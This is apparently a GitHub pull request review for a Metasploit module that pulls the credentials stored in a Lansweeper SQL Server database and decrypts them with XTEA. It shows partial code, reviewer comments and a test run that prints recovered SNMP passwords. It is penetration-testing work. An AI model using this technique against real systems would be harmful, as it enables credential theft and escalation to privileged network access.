### PR TITLE
lansweeper_collector retrieves and decrypts credentials stored in Lansweeper DB

### PR DESCRIPTION
**Pull request by cldrn**
I got domain admin privileges during a pentest today with this gem. I thought more people will find it useful.

screen shot 2015-06-26 at 12 44 00 pm

lansweeper

### CODE REVIEW

**Comment by void-in** [comment]
Excellent work. This should be using the new credential API to store the retrieved credentials.

**Comment by cldrn** [comment]
Thanks. I'll look into the creds api and apply the changes.

File: modules/auxiliary/gather/lansweeper_collector.rb [hunk 1]
```diff
@@ -0,0 +1,114 @@
...
+
+    if first == "1"
+      decrypted = decrypted[0, decrypted.length - 2]
+    end
+    Rex::Text.to_ascii(decrypted, 'utf-16le')
+  end
+
+  def run
+    result = mssql_query('select Credname, Username, Password from ' + datastore['DATABASE'] +
+    '.dbo.tsysCredentials WHERE LEN(Password)>64', false) if mssql_login_datastore
```
Comment (jlee-r7) [inline modules/auxiliary/gather/lansweeper_collector.rb]: if `mssql_login_datastore` fails, the next line will be a `nil` derefence bug. Would be better to quit if the login fails, e.g.:
```ruby
def run
  unless mssql_login_datastore
    fail_with(Failure::NoAccess, "Login failed")
  end
  result = mssql_query(...)
  ...
end

File: modules/auxiliary/gather/lansweeper_collector.rb [hunk 2]
```diff
@@ -0,0 +1,114 @@
...
+  def uint32(n)
+    n & 0xffffffff
+  end
+
+  def xteadecode(v, k)
+    num = 0xc6ef3720
+    num2 = uint32(v[0])
+    num3 = uint32(v[1])
+
+    for i in 0..0x1f
```
Comment (jlee-r7) [inline modules/auxiliary/gather/lansweeper_collector.rb]: Since you're not using the loop variable at all, this could be:
```ruby
0.upto(0x1f) do
```

**Comment by cldrn** [comment]
Thanks for all the pointers. I've applied your suggestions and update the module to support the credential API.

**Comment by void-in** [comment]
@cldrn Ah that is not the right way to do it. Actually report_auth_info is no longer the preferred method. If you test your module now, you should get a warning on your console telling you not to use report_auth_info. Have a look at https://github.com/jvazquez-r7/metasploit-framework/blob/eb39eaac1d00aec1cada9056a5f543704c8262f6/modules/post/windows/gather/credentials/razorsql.rb#L49 for an example of how to report credentials. If you need any help, let me know. I will gladly provide any assistance you need.

**Comment by cldrn** [comment]
Hi,
I updated the function to use the new API. Hopefully I didn't miss a required field because I didn't find the list of required options:
https://rapid7.github.io/metasploit-framework/api/Msf/Auxiliary/Report.html#create_credential-instance_method

**Comment by cldrn** [comment]
I added the missing required fields and it now works as expected. =)

screen shot 2015-07-07 at 1 48 38 pm

**Comment by jvazquez-r7** [comment]
Thanks @cldrn landed after some code cleanup, see final result here: https://github.com/rapid7/metasploit-framework/commit/67f661823acee7190972633e89ace2b63bfc8b8f

Test after cleanup:

```
msf auxiliary(lansweeper_collector) > run

[+] Credential name: SNMP-Private | username: SNMP Community String | password: private
[+] Credential name: Global SNMP | username:  | password: public
[*] Auxiliary module execution completed
msf auxiliary(lansweeper_collector) > creds
Credentials
===========

host            service                 public                 private  realm  private_type
----            -------                 ------                 -------  -----  ------------
172.16.158.136  1433/tcp (Global SNMP)  SNMP Community String  private         Password
172.16.158.136  1433/tcp (Global SNMP)                         public          Password
```

**Pull request merged**